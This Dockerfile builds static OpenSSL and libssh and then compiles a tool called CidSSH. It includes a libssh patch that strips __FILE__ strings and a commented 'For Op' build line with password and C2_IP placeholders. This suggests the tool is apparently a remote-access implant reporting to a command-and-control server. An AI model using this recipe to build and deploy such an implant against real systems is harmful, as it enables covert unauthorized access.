FROM alpine:latest
RUN apk add --no-cache build-base cmake autoconf libtool pkgconf git mercurial file linux-headers wget
WORKDIR /tmp/

# Building openssl statically (Requirement for libssh)
RUN wget https://www.openssl.org/source/openssl-1.1.0j.tar.gz && tar xf openssl-1.1.0j.tar.gz
RUN cd openssl-1.1.0j && ./config -fPIC && make && make install

# Building libssh statically (Requirement for CidSSH) 
RUN wget https://www.libssh.org/files/0.8/libssh-0.8.7.tar.xz && tar xf libssh-0.8.7.tar.xz
# Patch to remove __FILE__ reference
RUN cd libssh-0.8.7 && sed -i -e 's/__FILE__/"misc.c"/' src/misc.c
RUN cd libssh-0.8.7 && sed -i -e 's/OPENSSL_free(hex)/CRYPTO_free(hex, "", 0)/' src/bignum.c
RUN cd libssh-0.8.7 && mkdir build && cd build && cmake -DWITH_GSSAPI=OFF -DWITH_ZLIB=OFF -DWITH_SFTP=OFF -DWITH_STATIC_LIB=ON -DWITH_PCAP=OFF -DWITH_NACL=OFF -DCMAKE_BUILD_TYPE=Release .. && make && make install

COPY . /Cid-SSH/
WORKDIR /Cid-SSH/

# Building CidSSH
RUN rm -rf build && mkdir build
RUN cd build && cmake -DLIBSSH_LIBRARY=/usr/local/lib/libssh.a -DLIBSSH_INCLUDE=/tmp/libssh-0.8.7/include/ -DLIBSSH_CONFIG_FOLDER=/tmp/libssh-0.8.7/build/ -DCMAKE_BUILD_TYPE=Release .. && make 
# For Op
#RUN mkdir build && cd build && cmake -DLIBSSH_LIBRARY=/usr/local/lib/libssh.a -DLIBSSH_INCLUDE=/tmp/libssh-0.8.7/include/ -DLIBSSH_CONFIG_FOLDER=/tmp/libssh-0.8.7/build/ -DCMAKE_BUILD_TYPE=Release -DPASSWORD_AUTH="xxxxxxxxxx" -DC2_IP="XX.XX.XX.XX" .. && make 